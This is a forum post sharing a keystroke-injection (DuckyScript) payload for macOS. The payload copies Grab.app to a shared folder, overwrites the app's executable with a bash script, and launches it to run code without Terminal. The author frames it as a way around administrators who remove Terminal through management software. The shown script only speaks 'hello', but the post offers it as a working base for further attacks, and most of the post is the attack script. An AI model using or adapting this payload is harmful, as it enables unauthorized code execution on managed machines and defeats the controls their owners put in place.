Jump to content

3.14159jam

Members
  • Posts

    1
  • Joined

  • Last visited

Posts posted by 3.14159jam

  1. Here is my new payload to attack a Mac without using terminal.

    I got this idea after seeing how using good management software, an administrator can remove an app from a Mac (one such application being terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files and all without terminal. I used Grab.app for this but almost any app could be used, I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it.

     

    Here is the code, its outcome is to simply "say hello" (so if you test it have the volume up a bit). I have not really played with the delays yet, they are all over the place and some are to high but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have Fun, but please use this responsibly.

    DELAY 2000
    COMMAND SPACE
    DELAY 300
    STRING /Applications/Utilities/
    DELAY 200
    ENTER
    DELAY 400
    STRING g
    DELAY 500
    COMMAND c
    DELAY 300
    COMMAND SPACE
    DELAY 300
    STRING /Users/Shared/
    DELAY 400
    ENTER
    DELAY 400
    COMMAND v
    DELAY 2000
    COMMAND SPACE
    DELAY 300
    STRING /Users/Shared/Grab.app/Contents/MacOS/
    DELAY 600
    ENTER
    DELAY 500
    TAB
    DELAY 500
    COMMAND o
    DELAY 500
    COMMAND a
    DELAY 500
    STRING #!/bin/bash
    DELAY 400
    ENTER
    DELAY 300
    STRING say
    DELAY 300
    ESCAPE
    DELAY 300
    SPACE
    DELAY 300
    STRING hello
    DELAY 300
    COMMAND s
    DELAY 400
    COMMAND q
    DELAY 500
    COMMAND SPACE
    DELAY 300
    STRING /Users/Shared/Grab.app
    DELAY 400
    ENTER
    COMMAND w
    COMMAND w
    COMMAND w

     

×
×
  • Create New...